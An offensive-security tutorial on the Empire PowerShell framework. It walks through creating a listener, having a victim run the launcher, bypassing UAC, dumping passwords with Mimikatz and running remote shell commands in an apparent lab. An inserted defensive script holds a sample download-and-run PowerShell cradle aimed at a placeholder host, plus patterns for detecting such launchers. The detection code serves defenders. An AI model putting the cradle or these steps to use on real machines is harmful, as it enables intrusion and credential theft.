Hacking with Empire – PowerShell Post-Exploitation Agent

Hello everyone and welcome to this beginner’s guide to Empire. According to their official website:

“Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.”

In this tutorial we will cover everything you need to know about this software, from installation to getting a shell and even getting admin access without the antivirus noticing!

Before starting with the action you need to know these four things:

Listener: A listener is a process that waits for a connection from the machine we are attacking. This is how Empire sends the loot back to the attacker’s computer.

Stager: A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.

Agent: An agent is a program that maintains a connection between your computer and the compromised host.

Module: Modules are what execute our malicious commands; they can harvest credentials and escalate our privileges, as mentioned above.

Methodology:

  1. Creating a listener.
  2. Starting a listener.
  3. Generating PowerShell code using the launcher.
  4. Executing code on victim’s machine.
  5. Interacting with agent.
  6. Executing various modules.
  7. Bypassing UAC to get admin access.

To get started, clone the following git repo using git clone:

Now move into the cloned directory and run the install.sh file.

Wait for the installation to complete. This might take a few seconds. It will prompt you for a password; enter anything.

In my case, my password was toor.

Once the installation is done, move back up a directory and run Empire using ./empire

The help command lists all the essential options you need to get started.

As our methodology states, we will be creating a listener for our local machine first.

It will say that “no listeners are currently active”, but don’t worry, we are now in the listener interface.

This creates a listener on local port 80. If port 80 is already in use by a service such as Apache, make sure you stop that service first.

Note: Whenever you press tab twice, all the available options appear, just like everywhere else on Linux.

Hence, uselistener <tab><tab> shows me all the available listeners, and so on.

The above command will start the listener. Then go back and generate the powershell launcher for this listener, as shown in the image below.

All we have to do now is get this powershell code into the victim’s command prompt using social engineering. Let’s assume we have access to the victim’s command prompt and have pasted our code into his cmd.
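From the defender’s side, the launcher pasted into cmd is exactly what shows up in process-creation logs, so it is worth knowing what to look for. Below is an added example (not part of the original post, and not Empire’s own code) that scans constructed CommandLine log entries for the hidden-window/encoded-command shape of a PowerShell launcher and decodes the -EncodedCommand payload (base64 over UTF-16LE) so an analyst can read it; the sample script and log lines are constructed for the demo.

```python
import base64
import re

# Constructed sample of what an encoded launcher might carry (NOT Empire's real stager).
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://listener.invalid/launcher')"

def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation log lines (one CommandLine field each); not from the post.
SAMPLE_LOGS = [
    "CommandLine: powershell.exe -NoP -sta -NonI -W Hidden -Enc " + encode_command(SAMPLE_SCRIPT),
    "CommandLine: powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "CommandLine: cmd.exe /c netstat -ano",
]

# powershell.exe accepts any unambiguous prefix of a switch, so match the short forms too.
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden|-w\s+1\b", re.I)
NONINTERACTIVE_RE = re.compile(r"-non(?:i|interactive)?\b", re.I)
NOPROFILE_RE = re.compile(r"-nop(?:rofile)?\b", re.I)
ENCODED_RE = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
CRADLE_RE = re.compile(r"DownloadString|IEX|Invoke-Expression", re.I)

def decode_command(b64: str) -> str:
    """Reverse -EncodedCommand: base64 -> UTF-16LE text. Returns '' if it does not decode."""
    try:
        return base64.b64decode(b64).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def triage_line(line: str) -> dict:
    """Collect launcher indicators for one CommandLine entry and decode its payload if any."""
    indicators = []
    if "powershell" in line.lower():
        for name, pattern in (("hidden-window", HIDDEN_RE), ("non-interactive", NONINTERACTIVE_RE),
                              ("no-profile", NOPROFILE_RE)):
            if pattern.search(line):
                indicators.append(name)
        match = ENCODED_RE.search(line)
        decoded = decode_command(match.group(1)) if match else ""
        if decoded:
            indicators.append("encoded-command")
            if CRADLE_RE.search(decoded):
                indicators.append("download-cradle")
    else:
        decoded = ""
    # Two or more indicators together is the launcher shape; a lone -File run is not.
    return {"line": line, "indicators": indicators, "decoded": decoded, "suspicious": len(indicators) >= 2}

if __name__ == "__main__":
    for result in (triage_line(entry) for entry in SAMPLE_LOGS):
        print(result["suspicious"], result["indicators"], result["decoded"][:60])
```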

As soon as you hit enter you will see an agent become active on your Empire screen. After executing the malicious powershell code, go back to the main menu with the command:

Here you will see 1 agent active.

You can also rename the agent to something simpler using the rename command.

Now, to get an admin shell, run the bypassuac module with the following command.

The list command can be used in any interface to show the list for that interface. Here, in the agents interface, it displays a list of agents.

Let’s rename the new agent to something simpler, once again.

Now you can see that we got a new admin shell using bypassuac, and we renamed it to adminraj.

Let’s interact with adminraj now.

<tab><tab> helps us view all the options in the shell. There are several options that are quite helpful for post-exploitation, such as info, job and list, as shown in the image.

Info: shows all the basic details such as IP, nonce, jitter, integrity, etc.

Let’s try and run mimikatz to get the user’s password. Mimikatz won’t run from a normal guest user shell and will only run from an admin shell; this is exactly why we had to get admin access before we could use it.

Hmmmm!! And the password is “123” for user raj.

The above command dumps the credentials of any logged-on user, both in plaintext and as a hash.

Another important command is the shell command.

This feature lets us use the victim’s shell to run proper Microsoft Windows commands.

E.g., one such Windows cmd-only command is netstat.

As expected, it showed us all the ports currently in use on the machine!